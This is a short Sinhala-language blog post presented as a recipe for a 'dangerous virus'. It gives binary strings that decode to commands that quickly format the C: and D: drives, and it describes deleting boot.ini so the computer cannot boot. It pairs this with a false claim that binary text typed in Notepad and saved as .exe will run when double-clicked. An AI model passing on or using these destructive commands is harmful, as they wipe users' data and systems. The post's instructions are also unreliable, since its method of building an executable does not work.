භයානක VIRUS හදමුද???

 
මෙහෙමයි මේ code note pad එකේ ලියලා save as දෙන්න ඕනේ .exe විදියටයි.ඒක double click කරාම ලියල තියන දේ run වෙනවා.
මෙන්න code ටික....


මේ පලවෙනි code එකෙන් සිද්ද වෙන්නේ format c:\ /Q/X  ඒ කියන්නේ කෙලින්ම c drive එක format වෙනවා.
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000


මෙන්න මේකෙන් D එක 
 01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000



මෙන්න මේකෙන් වෙන්නේ del /F/S/Q c:\boot.ini ඒ කියන්නේ boot.ini එක මැකෙනවා.එහෙම උනාම පරිගණකය boot වෙන්නේ නෑ .
 

ආයෙමත් මම කියන්නේ මේවා ඔයාලගේ පරිගණකයේ අත්හදා බලන්න එපා.ඉගෙන ගන්නයි මම මේවා කියල දුන්නේ. මොකුත් නැති partition එකකට මේවා කරලා බලන්න පුළුවන් කැමතිනම්. එහෙනම් මම ගියා.

No comments:

Post a Comment